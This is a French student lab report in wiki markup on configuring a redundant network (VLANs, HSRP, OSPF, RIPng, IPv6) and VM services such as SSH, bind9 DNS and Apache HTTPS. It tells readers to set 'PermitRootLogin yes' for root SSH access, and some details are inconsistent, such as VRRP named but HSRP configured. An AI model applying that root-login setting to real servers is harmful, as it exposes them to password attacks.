On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
